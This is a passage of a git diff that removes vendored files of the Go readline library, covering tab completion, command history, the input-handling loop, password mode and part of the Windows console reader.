} - o.nextCandidate(1) - o.CompleteRefresh() -} - -func (o *opCompleter) nextCandidate(i int) { - o.candidateChoise += i - o.candidateChoise = o.candidateChoise % len(o.candidate) - if o.candidateChoise < 0 { - o.candidateChoise = len(o.candidate) + o.candidateChoise - } -} - -func (o *opCompleter) OnComplete() bool { - if o.width 
== 0 { - return false - } - if o.IsInCompleteSelectMode() { - o.doSelect() - return true - } - - buf := o.op.buf - rs := buf.Runes() - - if o.IsInCompleteMode() && o.candidateSource != nil && runes.Equal(rs, o.candidateSource) { - o.EnterCompleteSelectMode() - o.doSelect() - return true - } - - o.ExitCompleteSelectMode() - o.candidateSource = rs - newLines, offset := o.op.cfg.AutoComplete.Do(rs, buf.idx) - if len(newLines) == 0 { - o.ExitCompleteMode(false) - return true - } - - // only Aggregate candidates in non-complete mode - if !o.IsInCompleteMode() { - if len(newLines) == 1 { - buf.WriteRunes(newLines[0]) - o.ExitCompleteMode(false) - return true - } - - same, size := runes.Aggregate(newLines) - if size > 0 { - buf.WriteRunes(same) - o.ExitCompleteMode(false) - return true - } - } - - o.EnterCompleteMode(offset, newLines) - return true -} - -func (o *opCompleter) IsInCompleteSelectMode() bool { - return o.inSelectMode -} - -func (o *opCompleter) IsInCompleteMode() bool { - return o.inCompleteMode -} - -func (o *opCompleter) HandleCompleteSelect(r rune) bool { - next := true - switch r { - case CharEnter, CharCtrlJ: - next = false - o.op.buf.WriteRunes(o.op.candidate[o.op.candidateChoise]) - o.ExitCompleteMode(false) - case CharLineStart: - num := o.candidateChoise % o.candidateColNum - o.nextCandidate(-num) - case CharLineEnd: - num := o.candidateColNum - o.candidateChoise%o.candidateColNum - 1 - o.candidateChoise += num - if o.candidateChoise >= len(o.candidate) { - o.candidateChoise = len(o.candidate) - 1 - } - case CharBackspace: - o.ExitCompleteSelectMode() - next = false - case CharTab, CharForward: - o.doSelect() - case CharBell, CharInterrupt: - o.ExitCompleteMode(true) - next = false - case CharNext: - tmpChoise := o.candidateChoise + o.candidateColNum - if tmpChoise >= o.getMatrixSize() { - tmpChoise -= o.getMatrixSize() - } else if tmpChoise >= len(o.candidate) { - tmpChoise += o.candidateColNum - tmpChoise -= o.getMatrixSize() - } - o.candidateChoise = tmpChoise - case CharBackward: - o.nextCandidate(-1) - case CharPrev: - tmpChoise := o.candidateChoise - o.candidateColNum - if tmpChoise < 0 { - tmpChoise += o.getMatrixSize() - if tmpChoise >= len(o.candidate) { - tmpChoise -= o.candidateColNum - } - } - o.candidateChoise = tmpChoise - default: - next = false - o.ExitCompleteSelectMode() - } - if next { - o.CompleteRefresh() - return true - } - return false -} - -func (o *opCompleter) getMatrixSize() int { - line := len(o.candidate) / o.candidateColNum - if len(o.candidate)%o.candidateColNum != 0 { - line++ - } - return line * o.candidateColNum -} - -func (o *opCompleter) OnWidthChange(newWidth int) { - o.width = newWidth -} - -func (o *opCompleter) CompleteRefresh() { - if !o.inCompleteMode { - return - } - lineCnt := o.op.buf.CursorLineCount() - colWidth := 0 - for _, c := range o.candidate { - w := runes.WidthAll(c) - if w > colWidth { - colWidth = w - } - } - colWidth += o.candidateOff + 1 - same := o.op.buf.RuneSlice(-o.candidateOff) - - // -1 to avoid reach the end of line - width := o.width - 1 - colNum := width / colWidth - colWidth += (width - (colWidth * colNum)) / colNum - - o.candidateColNum = colNum - buf := bufio.NewWriter(o.w) - buf.Write(bytes.Repeat([]byte("\n"), lineCnt)) - - colIdx := 0 - lines := 1 - buf.WriteString("\033[J") - for idx, c := range o.candidate { - inSelect := idx == o.candidateChoise && o.IsInCompleteSelectMode() - if inSelect { - buf.WriteString("\033[30;47m") - } - buf.WriteString(string(same)) - buf.WriteString(string(c)) - 
buf.Write(bytes.Repeat([]byte(" "), colWidth-len(c)-len(same))) - - if inSelect { - buf.WriteString("\033[0m") - } - - colIdx++ - if colIdx == colNum { - buf.WriteString("\n") - lines++ - colIdx = 0 - } - } - - // move back - fmt.Fprintf(buf, "\033[%dA\r", lineCnt-1+lines) - fmt.Fprintf(buf, "\033[%dC", o.op.buf.idx+o.op.buf.PromptLen()) - buf.Flush() -} - -func (o *opCompleter) aggCandidate(candidate [][]rune) int { - offset := 0 - for i := 0; i < len(candidate[0]); i++ { - for j := 0; j < len(candidate)-1; j++ { - if i > len(candidate[j]) { - goto aggregate - } - if candidate[j][i] != candidate[j+1][i] { - goto aggregate - } - } - offset = i - } -aggregate: - return offset -} - -func (o *opCompleter) EnterCompleteSelectMode() { - o.inSelectMode = true - o.candidateChoise = -1 - o.CompleteRefresh() -} - -func (o *opCompleter) EnterCompleteMode(offset int, candidate [][]rune) { - o.inCompleteMode = true - o.candidate = candidate - o.candidateOff = offset - o.CompleteRefresh() -} - -func (o *opCompleter) ExitCompleteSelectMode() { - o.inSelectMode = false - o.candidate = nil - o.candidateChoise = -1 - o.candidateOff = -1 - o.candidateSource = nil -} - -func (o *opCompleter) ExitCompleteMode(revent bool) { - o.inCompleteMode = false - o.ExitCompleteSelectMode() -} diff --git a/vendor/github.com/chzyer/readline/complete_helper.go b/vendor/github.com/chzyer/readline/complete_helper.go deleted file mode 100644 index 58d72487..00000000 --- a/vendor/github.com/chzyer/readline/complete_helper.go +++ /dev/null @@ -1,165 +0,0 @@ -package readline - -import ( - "bytes" - "strings" -) - -// Caller type for dynamic completion -type DynamicCompleteFunc func(string) []string - -type PrefixCompleterInterface interface { - Print(prefix string, level int, buf *bytes.Buffer) - Do(line []rune, pos int) (newLine [][]rune, length int) - GetName() []rune - GetChildren() []PrefixCompleterInterface - SetChildren(children []PrefixCompleterInterface) -} - -type DynamicPrefixCompleterInterface interface { - PrefixCompleterInterface - IsDynamic() bool - GetDynamicNames(line []rune) [][]rune -} - -type PrefixCompleter struct { - Name []rune - Dynamic bool - Callback DynamicCompleteFunc - Children []PrefixCompleterInterface -} - -func (p *PrefixCompleter) Tree(prefix string) string { - buf := bytes.NewBuffer(nil) - p.Print(prefix, 0, buf) - return buf.String() -} - -func Print(p PrefixCompleterInterface, prefix string, level int, buf *bytes.Buffer) { - if strings.TrimSpace(string(p.GetName())) != "" { - buf.WriteString(prefix) - if level > 0 { - buf.WriteString("├") - buf.WriteString(strings.Repeat("─", (level*4)-2)) - buf.WriteString(" ") - } - buf.WriteString(string(p.GetName()) + "\n") - level++ - } - for _, ch := range p.GetChildren() { - ch.Print(prefix, level, buf) - } -} - -func (p *PrefixCompleter) Print(prefix string, level int, buf *bytes.Buffer) { - Print(p, prefix, level, buf) -} - -func (p *PrefixCompleter) IsDynamic() bool { - return p.Dynamic -} - -func (p *PrefixCompleter) GetName() []rune { - return p.Name -} - -func (p *PrefixCompleter) GetDynamicNames(line []rune) [][]rune { - var names = [][]rune{} - for _, name := range p.Callback(string(line)) { - names = append(names, []rune(name+" ")) - } - return names -} - -func (p *PrefixCompleter) GetChildren() []PrefixCompleterInterface { - return p.Children -} - -func (p *PrefixCompleter) SetChildren(children []PrefixCompleterInterface) { - p.Children = children -} - -func NewPrefixCompleter(pc ...PrefixCompleterInterface) *PrefixCompleter { - return 
PcItem("", pc...) -} - -func PcItem(name string, pc ...PrefixCompleterInterface) *PrefixCompleter { - name += " " - return &PrefixCompleter{ - Name: []rune(name), - Dynamic: false, - Children: pc, - } -} - -func PcItemDynamic(callback DynamicCompleteFunc, pc ...PrefixCompleterInterface) *PrefixCompleter { - return &PrefixCompleter{ - Callback: callback, - Dynamic: true, - Children: pc, - } -} - -func (p *PrefixCompleter) Do(line []rune, pos int) (newLine [][]rune, offset int) { - return doInternal(p, line, pos, line) -} - -func Do(p PrefixCompleterInterface, line []rune, pos int) (newLine [][]rune, offset int) { - return doInternal(p, line, pos, line) -} - -func doInternal(p PrefixCompleterInterface, line []rune, pos int, origLine []rune) (newLine [][]rune, offset int) { - line = runes.TrimSpaceLeft(line[:pos]) - goNext := false - var lineCompleter PrefixCompleterInterface - for _, child := range p.GetChildren() { - childNames := make([][]rune, 1) - - childDynamic, ok := child.(DynamicPrefixCompleterInterface) - if ok && childDynamic.IsDynamic() { - childNames = childDynamic.GetDynamicNames(origLine) - } else { - childNames[0] = child.GetName() - } - - for _, childName := range childNames { - if len(line) >= len(childName) { - if runes.HasPrefix(line, childName) { - if len(line) == len(childName) { - newLine = append(newLine, []rune{' '}) - } else { - newLine = append(newLine, childName) - } - offset = len(childName) - lineCompleter = child - goNext = true - } - } else { - if runes.HasPrefix(childName, line) { - newLine = append(newLine, childName[len(line):]) - offset = len(line) - lineCompleter = child - } - } - } - } - - if len(newLine) != 1 { - return - } - - tmpLine := make([]rune, 0, len(line)) - for i := offset; i < len(line); i++ { - if line[i] == ' ' { - continue - } - - tmpLine = append(tmpLine, line[i:]...) 
- return doInternal(lineCompleter, tmpLine, len(tmpLine), origLine) - } - - if goNext { - return doInternal(lineCompleter, nil, 0, origLine) - } - return -} diff --git a/vendor/github.com/chzyer/readline/complete_segment.go b/vendor/github.com/chzyer/readline/complete_segment.go deleted file mode 100644 index 5ceadd80..00000000 --- a/vendor/github.com/chzyer/readline/complete_segment.go +++ /dev/null @@ -1,82 +0,0 @@ -package readline - -type SegmentCompleter interface { - // a - // |- a1 - // |--- a11 - // |- a2 - // b - // input: - // DoTree([], 0) [a, b] - // DoTree([a], 1) [a] - // DoTree([a, ], 0) [a1, a2] - // DoTree([a, a], 1) [a1, a2] - // DoTree([a, a1], 2) [a1] - // DoTree([a, a1, ], 0) [a11] - // DoTree([a, a1, a], 1) [a11] - DoSegment([][]rune, int) [][]rune -} - -type dumpSegmentCompleter struct { - f func([][]rune, int) [][]rune -} - -func (d *dumpSegmentCompleter) DoSegment(segment [][]rune, n int) [][]rune { - return d.f(segment, n) -} - -func SegmentFunc(f func([][]rune, int) [][]rune) AutoCompleter { - return &SegmentComplete{&dumpSegmentCompleter{f}} -} - -func SegmentAutoComplete(completer SegmentCompleter) *SegmentComplete { - return &SegmentComplete{ - SegmentCompleter: completer, - } -} - -type SegmentComplete struct { - SegmentCompleter -} - -func RetSegment(segments [][]rune, cands [][]rune, idx int) ([][]rune, int) { - ret := make([][]rune, 0, len(cands)) - lastSegment := segments[len(segments)-1] - for _, cand := range cands { - if !runes.HasPrefix(cand, lastSegment) { - continue - } - ret = append(ret, cand[len(lastSegment):]) - } - return ret, idx -} - -func SplitSegment(line []rune, pos int) ([][]rune, int) { - segs := [][]rune{} - lastIdx := -1 - line = line[:pos] - pos = 0 - for idx, l := range line { - if l == ' ' { - pos = 0 - segs = append(segs, line[lastIdx+1:idx]) - lastIdx = idx - } else { - pos++ - } - } - segs = append(segs, line[lastIdx+1:]) - return segs, pos -} - -func (c *SegmentComplete) Do(line []rune, pos int) (newLine [][]rune, offset int) { - - segment, idx := SplitSegment(line, pos) - - cands := c.DoSegment(segment, idx) - newLine, offset = RetSegment(segment, cands, idx) - for idx := range newLine { - newLine[idx] = append(newLine[idx], ' ') - } - return newLine, offset -} diff --git a/vendor/github.com/chzyer/readline/history.go b/vendor/github.com/chzyer/readline/history.go deleted file mode 100644 index b154aedd..00000000 --- a/vendor/github.com/chzyer/readline/history.go +++ /dev/null @@ -1,312 +0,0 @@ -package readline - -import ( - "bufio" - "container/list" - "fmt" - "os" - "strings" - "sync" -) - -type hisItem struct { - Source []rune - Version int64 - Tmp []rune -} - -func (h *hisItem) Clean() { - h.Source = nil - h.Tmp = nil -} - -type opHistory struct { - cfg *Config - history *list.List - historyVer int64 - current *list.Element - fd *os.File - fdLock sync.Mutex -} - -func newOpHistory(cfg *Config) (o *opHistory) { - o = &opHistory{ - cfg: cfg, - history: list.New(), - } - return o -} - -func (o *opHistory) Reset() { - o.history = list.New() - o.current = nil -} - -func (o *opHistory) IsHistoryClosed() bool { - o.fdLock.Lock() - defer o.fdLock.Unlock() - return o.fd.Fd() == ^(uintptr(0)) -} - -func (o *opHistory) Init() { - if o.IsHistoryClosed() { - o.initHistory() - } -} - -func (o *opHistory) initHistory() { - if o.cfg.HistoryFile != "" { - o.historyUpdatePath(o.cfg.HistoryFile) - } -} - -// only called by newOpHistory -func (o *opHistory) historyUpdatePath(path string) { - o.fdLock.Lock() - defer o.fdLock.Unlock() - f, err 
:= os.OpenFile(path, os.O_APPEND|os.O_CREATE|os.O_RDWR, 0666) - if err != nil { - return - } - o.fd = f - r := bufio.NewReader(o.fd) - total := 0 - for ; ; total++ { - line, err := r.ReadString('\n') - if err != nil { - break - } - // ignore the empty line - line = strings.TrimSpace(line) - if len(line) == 0 { - continue - } - o.Push([]rune(line)) - o.Compact() - } - if total > o.cfg.HistoryLimit { - o.rewriteLocked() - } - o.historyVer++ - o.Push(nil) - return -} - -func (o *opHistory) Compact() { - for o.history.Len() > o.cfg.HistoryLimit && o.history.Len() > 0 { - o.history.Remove(o.history.Front()) - } -} - -func (o *opHistory) Rewrite() { - o.fdLock.Lock() - defer o.fdLock.Unlock() - o.rewriteLocked() -} - -func (o *opHistory) rewriteLocked() { - if o.cfg.HistoryFile == "" { - return - } - - tmpFile := o.cfg.HistoryFile + ".tmp" - fd, err := os.OpenFile(tmpFile, os.O_CREATE|os.O_WRONLY|os.O_TRUNC|os.O_APPEND, 0666) - if err != nil { - return - } - - buf := bufio.NewWriter(fd) - for elem := o.history.Front(); elem != nil; elem = elem.Next() { - buf.WriteString(string(elem.Value.(*hisItem).Source)) - } - buf.Flush() - - // replace history file - if err = os.Rename(tmpFile, o.cfg.HistoryFile); err != nil { - fd.Close() - return - } - - if o.fd != nil { - o.fd.Close() - } - // fd is write only, just satisfy what we need. - o.fd = fd -} - -func (o *opHistory) Close() { - o.fdLock.Lock() - defer o.fdLock.Unlock() - if o.fd != nil { - o.fd.Close() - } -} - -func (o *opHistory) FindBck(isNewSearch bool, rs []rune, start int) (int, *list.Element) { - for elem := o.current; elem != nil; elem = elem.Prev() { - item := o.showItem(elem.Value) - if isNewSearch { - start += len(rs) - } - if elem == o.current { - if len(item) >= start { - item = item[:start] - } - } - idx := runes.IndexAllBckEx(item, rs, o.cfg.HistorySearchFold) - if idx < 0 { - continue - } - return idx, elem - } - return -1, nil -} - -func (o *opHistory) FindFwd(isNewSearch bool, rs []rune, start int) (int, *list.Element) { - for elem := o.current; elem != nil; elem = elem.Next() { - item := o.showItem(elem.Value) - if isNewSearch { - start -= len(rs) - if start < 0 { - start = 0 - } - } - if elem == o.current { - if len(item)-1 >= start { - item = item[start:] - } else { - continue - } - } - idx := runes.IndexAllEx(item, rs, o.cfg.HistorySearchFold) - if idx < 0 { - continue - } - if elem == o.current { - idx += start - } - return idx, elem - } - return -1, nil -} - -func (o *opHistory) showItem(obj interface{}) []rune { - item := obj.(*hisItem) - if item.Version == o.historyVer { - return item.Tmp - } - return item.Source -} - -func (o *opHistory) Prev() []rune { - if o.current == nil { - return nil - } - current := o.current.Prev() - if current == nil { - return nil - } - o.current = current - return runes.Copy(o.showItem(current.Value)) -} - -func (o *opHistory) Next() ([]rune, bool) { - if o.current == nil { - return nil, false - } - current := o.current.Next() - if current == nil { - return nil, false - } - - o.current = current - return runes.Copy(o.showItem(current.Value)), true -} - -func (o *opHistory) debug() { - Debug("-------") - for item := o.history.Front(); item != nil; item = item.Next() { - Debug(fmt.Sprintf("%+v", item.Value)) - } -} - -// save history -func (o *opHistory) New(current []rune) (err error) { - current = runes.Copy(current) - - // if just use last command without modify - // just clean lastest history - if back := o.history.Back(); back != nil { - prev := back.Prev() - if prev != nil { - if 
runes.Equal(current, prev.Value.(*hisItem).Source) { - o.current = o.history.Back() - o.current.Value.(*hisItem).Clean() - o.historyVer++ - return nil - } - } - } - - if len(current) == 0 { - o.current = o.history.Back() - if o.current != nil { - o.current.Value.(*hisItem).Clean() - o.historyVer++ - return nil - } - } - - if o.current != o.history.Back() { - // move history item to current command - currentItem := o.current.Value.(*hisItem) - // set current to last item - o.current = o.history.Back() - - current = runes.Copy(currentItem.Tmp) - } - - // err only can be a IO error, just report - err = o.Update(current, true) - - // push a new one to commit current command - o.historyVer++ - o.Push(nil) - return -} - -func (o *opHistory) Revert() { - o.historyVer++ - o.current = o.history.Back() -} - -func (o *opHistory) Update(s []rune, commit bool) (err error) { - o.fdLock.Lock() - defer o.fdLock.Unlock() - s = runes.Copy(s) - if o.current == nil { - o.Push(s) - o.Compact() - return - } - r := o.current.Value.(*hisItem) - r.Version = o.historyVer - if commit { - r.Source = s - if o.fd != nil { - // just report the error - _, err = o.fd.Write([]byte(string(r.Source) + "\n")) - } - } else { - r.Tmp = append(r.Tmp[:0], s...) - } - o.current.Value = r - o.Compact() - return -} - -func (o *opHistory) Push(s []rune) { - s = runes.Copy(s) - elem := o.history.PushBack(&hisItem{Source: s}) - o.current = elem -} diff --git a/vendor/github.com/chzyer/readline/operation.go b/vendor/github.com/chzyer/readline/operation.go deleted file mode 100644 index 2c93561d..00000000 --- a/vendor/github.com/chzyer/readline/operation.go +++ /dev/null @@ -1,504 +0,0 @@ -package readline - -import ( - "errors" - "io" -) - -var ( - ErrInterrupt = errors.New("Interrupt") -) - -type InterruptError struct { - Line []rune -} - -func (*InterruptError) Error() string { - return "Interrupted" -} - -type Operation struct { - cfg *Config - t *Terminal - buf *RuneBuffer - outchan chan []rune - errchan chan error - w io.Writer - - history *opHistory - *opSearch - *opCompleter - *opPassword - *opVim -} - -func (o *Operation) SetBuffer(what string) { - o.buf.Set([]rune(what)) -} - -type wrapWriter struct { - r *Operation - t *Terminal - target io.Writer -} - -func (w *wrapWriter) Write(b []byte) (int, error) { - if !w.t.IsReading() { - return w.target.Write(b) - } - - var ( - n int - err error - ) - w.r.buf.Refresh(func() { - n, err = w.target.Write(b) - }) - - if w.r.IsSearchMode() { - w.r.SearchRefresh(-1) - } - if w.r.IsInCompleteMode() { - w.r.CompleteRefresh() - } - return n, err -} - -func NewOperation(t *Terminal, cfg *Config) *Operation { - width := cfg.FuncGetWidth() - op := &Operation{ - t: t, - buf: NewRuneBuffer(t, cfg.Prompt, cfg, width), - outchan: make(chan []rune), - errchan: make(chan error), - } - op.w = op.buf.w - op.SetConfig(cfg) - op.opVim = newVimMode(op) - op.opCompleter = newOpCompleter(op.buf.w, op, width) - op.opPassword = newOpPassword(op) - op.cfg.FuncOnWidthChanged(func() { - newWidth := cfg.FuncGetWidth() - op.opCompleter.OnWidthChange(newWidth) - op.opSearch.OnWidthChange(newWidth) - op.buf.OnWidthChange(newWidth) - }) - go op.ioloop() - return op -} - -func (o *Operation) SetPrompt(s string) { - o.buf.SetPrompt(s) -} - -func (o *Operation) SetMaskRune(r rune) { - o.buf.SetMask(r) -} - -func (o *Operation) ioloop() { - for { - keepInSearchMode := false - keepInCompleteMode := false - r := o.t.ReadRune() - if o.cfg.FuncFilterInputRune != nil { - var process bool - r, process = 
o.cfg.FuncFilterInputRune(r) - if !process { - o.buf.Refresh(nil) // to refresh the line - continue // ignore this rune - } - } - - if r == 0 { // io.EOF - if o.buf.Len() == 0 { - o.buf.Clean() - select { - case o.errchan <- io.EOF: - } - break - } else { - // if stdin got io.EOF and there is something left in buffer, - // let's flush them by sending CharEnter. - // And we will got io.EOF int next loop. - r = CharEnter - } - } - isUpdateHistory := true - - if o.IsInCompleteSelectMode() { - keepInCompleteMode = o.HandleCompleteSelect(r) - if keepInCompleteMode { - continue - } - - o.buf.Refresh(nil) - switch r { - case CharEnter, CharCtrlJ: - o.history.Update(o.buf.Runes(), false) - fallthrough - case CharInterrupt: - o.t.KickRead() - fallthrough - case CharBell: - continue - } - } - - if o.IsEnableVimMode() { - r = o.HandleVim(r, o.t.ReadRune) - if r == 0 { - continue - } - } - - switch r { - case CharBell: - if o.IsSearchMode() { - o.ExitSearchMode(true) - o.buf.Refresh(nil) - } - if o.IsInCompleteMode() { - o.ExitCompleteMode(true) - o.buf.Refresh(nil) - } - case CharTab: - if o.cfg.AutoComplete == nil { - o.t.Bell() - break - } - if o.OnComplete() { - keepInCompleteMode = true - } else { - o.t.Bell() - break - } - - case CharBckSearch: - if !o.SearchMode(S_DIR_BCK) { - o.t.Bell() - break - } - keepInSearchMode = true - case CharCtrlU: - o.buf.KillFront() - case CharFwdSearch: - if !o.SearchMode(S_DIR_FWD) { - o.t.Bell() - break - } - keepInSearchMode = true - case CharKill: - o.buf.Kill() - keepInCompleteMode = true - case MetaForward: - o.buf.MoveToNextWord() - case CharTranspose: - o.buf.Transpose() - case MetaBackward: - o.buf.MoveToPrevWord() - case MetaDelete: - o.buf.DeleteWord() - case CharLineStart: - o.buf.MoveToLineStart() - case CharLineEnd: - o.buf.MoveToLineEnd() - case CharBackspace, CharCtrlH: - if o.IsSearchMode() { - o.SearchBackspace() - keepInSearchMode = true - break - } - - if o.buf.Len() == 0 { - o.t.Bell() - break - } - o.buf.Backspace() - if o.IsInCompleteMode() { - o.OnComplete() - } - case CharCtrlZ: - o.buf.Clean() - o.t.SleepToResume() - o.Refresh() - case CharCtrlL: - ClearScreen(o.w) - o.Refresh() - case MetaBackspace, CharCtrlW: - o.buf.BackEscapeWord() - case CharEnter, CharCtrlJ: - if o.IsSearchMode() { - o.ExitSearchMode(false) - } - o.buf.MoveToLineEnd() - var data []rune - if !o.cfg.UniqueEditLine { - o.buf.WriteRune('\n') - data = o.buf.Reset() - data = data[:len(data)-1] // trim \n - } else { - o.buf.Clean() - data = o.buf.Reset() - } - o.outchan <- data - if !o.cfg.DisableAutoSaveHistory { - // ignore IO error - _ = o.history.New(data) - } else { - isUpdateHistory = false - } - case CharBackward: - o.buf.MoveBackward() - case CharForward: - o.buf.MoveForward() - case CharPrev: - buf := o.history.Prev() - if buf != nil { - o.buf.Set(buf) - } else { - o.t.Bell() - } - case CharNext: - buf, ok := o.history.Next() - if ok { - o.buf.Set(buf) - } else { - o.t.Bell() - } - case CharDelete: - if o.buf.Len() > 0 || !o.IsNormalMode() { - o.t.KickRead() - if !o.buf.Delete() { - o.t.Bell() - } - break - } - - // treat as EOF - if !o.cfg.UniqueEditLine { - o.buf.WriteString(o.cfg.EOFPrompt + "\n") - } - o.buf.Reset() - isUpdateHistory = false - o.history.Revert() - o.errchan <- io.EOF - if o.cfg.UniqueEditLine { - o.buf.Clean() - } - case CharInterrupt: - if o.IsSearchMode() { - o.t.KickRead() - o.ExitSearchMode(true) - break - } - if o.IsInCompleteMode() { - o.t.KickRead() - o.ExitCompleteMode(true) - o.buf.Refresh(nil) - break - } - o.buf.MoveToLineEnd() - 
o.buf.Refresh(nil) - hint := o.cfg.InterruptPrompt + "\n" - if !o.cfg.UniqueEditLine { - o.buf.WriteString(hint) - } - remain := o.buf.Reset() - if !o.cfg.UniqueEditLine { - remain = remain[:len(remain)-len([]rune(hint))] - } - isUpdateHistory = false - o.history.Revert() - o.errchan <- &InterruptError{remain} - default: - if o.IsSearchMode() { - o.SearchChar(r) - keepInSearchMode = true - break - } - o.buf.WriteRune(r) - if o.IsInCompleteMode() { - o.OnComplete() - keepInCompleteMode = true - } - } - - if o.cfg.Listener != nil { - newLine, newPos, ok := o.cfg.Listener.OnChange(o.buf.Runes(), o.buf.Pos(), r) - if ok { - o.buf.SetWithIdx(newPos, newLine) - } - } - - if !keepInSearchMode && o.IsSearchMode() { - o.ExitSearchMode(false) - o.buf.Refresh(nil) - } else if o.IsInCompleteMode() { - if !keepInCompleteMode { - o.ExitCompleteMode(false) - o.Refresh() - } else { - o.buf.Refresh(nil) - o.CompleteRefresh() - } - } - if isUpdateHistory && !o.IsSearchMode() { - // it will cause null history - o.history.Update(o.buf.Runes(), false) - } - } -} - -func (o *Operation) Stderr() io.Writer { - return &wrapWriter{target: o.cfg.Stderr, r: o, t: o.t} -} - -func (o *Operation) Stdout() io.Writer { - return &wrapWriter{target: o.cfg.Stdout, r: o, t: o.t} -} - -func (o *Operation) String() (string, error) { - r, err := o.Runes() - return string(r), err -} - -func (o *Operation) Runes() ([]rune, error) { - o.t.EnterRawMode() - defer o.t.ExitRawMode() - - if o.cfg.Listener != nil { - o.cfg.Listener.OnChange(nil, 0, 0) - } - - o.buf.Refresh(nil) // print prompt - o.t.KickRead() - select { - case r := <-o.outchan: - return r, nil - case err := <-o.errchan: - if e, ok := err.(*InterruptError); ok { - return e.Line, ErrInterrupt - } - return nil, err - } -} - -func (o *Operation) PasswordEx(prompt string, l Listener) ([]byte, error) { - cfg := o.GenPasswordConfig() - cfg.Prompt = prompt - cfg.Listener = l - return o.PasswordWithConfig(cfg) -} - -func (o *Operation) GenPasswordConfig() *Config { - return o.opPassword.PasswordConfig() -} - -func (o *Operation) PasswordWithConfig(cfg *Config) ([]byte, error) { - if err := o.opPassword.EnterPasswordMode(cfg); err != nil { - return nil, err - } - defer o.opPassword.ExitPasswordMode() - return o.Slice() -} - -func (o *Operation) Password(prompt string) ([]byte, error) { - return o.PasswordEx(prompt, nil) -} - -func (o *Operation) SetTitle(t string) { - o.w.Write([]byte("\033[2;" + t + "\007")) -} - -func (o *Operation) Slice() ([]byte, error) { - r, err := o.Runes() - if err != nil { - return nil, err - } - return []byte(string(r)), nil -} - -func (o *Operation) Close() { - o.history.Close() -} - -func (o *Operation) SetHistoryPath(path string) { - if o.history != nil { - o.history.Close() - } - o.cfg.HistoryFile = path - o.history = newOpHistory(o.cfg) -} - -func (o *Operation) IsNormalMode() bool { - return !o.IsInCompleteMode() && !o.IsSearchMode() -} - -func (op *Operation) SetConfig(cfg *Config) (*Config, error) { - if op.cfg == cfg { - return op.cfg, nil - } - if err := cfg.Init(); err != nil { - return op.cfg, err - } - old := op.cfg - op.cfg = cfg - op.SetPrompt(cfg.Prompt) - op.SetMaskRune(cfg.MaskRune) - op.buf.SetConfig(cfg) - width := op.cfg.FuncGetWidth() - - if cfg.opHistory == nil { - op.SetHistoryPath(cfg.HistoryFile) - cfg.opHistory = op.history - cfg.opSearch = newOpSearch(op.buf.w, op.buf, op.history, cfg, width) - } - op.history = cfg.opHistory - - // SetHistoryPath will close opHistory which already exists - // so if we use it next time, we 
need to reopen it by `InitHistory()` - op.history.Init() - - if op.cfg.AutoComplete != nil { - op.opCompleter = newOpCompleter(op.buf.w, op, width) - } - - op.opSearch = cfg.opSearch - return old, nil -} - -func (o *Operation) ResetHistory() { - o.history.Reset() -} - -// if err is not nil, it just mean it fail to write to file -// other things goes fine. -func (o *Operation) SaveHistory(content string) error { - return o.history.New([]rune(content)) -} - -func (o *Operation) Refresh() { - if o.t.IsReading() { - o.buf.Refresh(nil) - } -} - -func (o *Operation) Clean() { - o.buf.Clean() -} - -func FuncListener(f func(line []rune, pos int, key rune) (newLine []rune, newPos int, ok bool)) Listener { - return &DumpListener{f: f} -} - -type DumpListener struct { - f func(line []rune, pos int, key rune) (newLine []rune, newPos int, ok bool) -} - -func (d *DumpListener) OnChange(line []rune, pos int, key rune) (newLine []rune, newPos int, ok bool) { - return d.f(line, pos, key) -} - -type Listener interface { - OnChange(line []rune, pos int, key rune) (newLine []rune, newPos int, ok bool) -} diff --git a/vendor/github.com/chzyer/readline/password.go b/vendor/github.com/chzyer/readline/password.go deleted file mode 100644 index 4b073795..00000000 --- a/vendor/github.com/chzyer/readline/password.go +++ /dev/null @@ -1,32 +0,0 @@ -package readline - -type opPassword struct { - o *Operation - backupCfg *Config -} - -func newOpPassword(o *Operation) *opPassword { - return &opPassword{o: o} -} - -func (o *opPassword) ExitPasswordMode() { - o.o.SetConfig(o.backupCfg) - o.backupCfg = nil -} - -func (o *opPassword) EnterPasswordMode(cfg *Config) (err error) { - o.backupCfg, err = o.o.SetConfig(cfg) - return -} - -func (o *opPassword) PasswordConfig() *Config { - return &Config{ - EnableMask: true, - InterruptPrompt: "\n", - EOFPrompt: "\n", - HistoryLimit: -1, - - Stdout: o.o.cfg.Stdout, - Stderr: o.o.cfg.Stderr, - } -} diff --git a/vendor/github.com/chzyer/readline/rawreader_windows.go b/vendor/github.com/chzyer/readline/rawreader_windows.go deleted file mode 100644 index 073ef150..00000000 --- a/vendor/github.com/chzyer/readline/rawreader_windows.go +++ /dev/null @@ -1,125 +0,0 @@ -// +build windows - -package readline - -import "unsafe" - -const ( - VK_CANCEL = 0x03 - VK_BACK = 0x08 - VK_TAB = 0x09 - VK_RETURN = 0x0D - VK_SHIFT = 0x10 - VK_CONTROL = 0x11 - VK_MENU = 0x12 - VK_ESCAPE = 0x1B - VK_LEFT = 0x25 - VK_UP = 0x26 - VK_RIGHT = 0x27 - VK_DOWN = 0x28 - VK_DELETE = 0x2E - VK_LSHIFT = 0xA0 - VK_RSHIFT = 0xA1 - VK_LCONTROL = 0xA2 - VK_RCONTROL = 0xA3 -) - -// RawReader translate input record to ANSI escape sequence. -// To provides same behavior as unix terminal. 
-type RawReader struct { - ctrlKey bool - altKey bool -} - -func NewRawReader() *RawReader { - r := new(RawReader) - return r -} - -// only process one action in one read -func (r *RawReader) Read(buf []byte) (int, error) { - ir := new(_INPUT_RECORD) - var read int - var err error -next: - err = kernel.ReadConsoleInputW(stdin, - uintptr(unsafe.Pointer(ir)), - 1, - uintptr(unsafe.Pointer(&read)), - ) - if err != nil { - return 0, err - } - if ir.EventType != EVENT_KEY { - goto next - } - ker := (*_KEY_EVENT_RECORD)(unsafe.Pointer(&ir.Event[0])) - if ker.bKeyDown == 0 { // keyup - if r.ctrlKey || r.altKey { - switch ker.wVirtualKeyCode { - case VK_RCONTROL, VK_LCONTROL: - r.ctrlKey = false - case VK_MENU: //alt - r.altKey = false - } - } - goto next - } - - if ker.unicodeChar == 0 { - var target rune - switch ker.wVirtualKeyCode { - case VK_RCONTROL, VK_LCONTROL: - r.ctrlKey = true - case VK_MENU: //alt - r.altKey = true - case VK_LEFT: - target = CharBackward - case VK_RIGHT: - target = CharForward - case VK_UP: - target = CharPrev - case VK_DOWN: - target = CharNext - } - if target != 0 { - return r.write(buf, target) - } - goto next - } - char := rune(ker.unicodeChar) - if r.ctrlKey { - switch char { - case 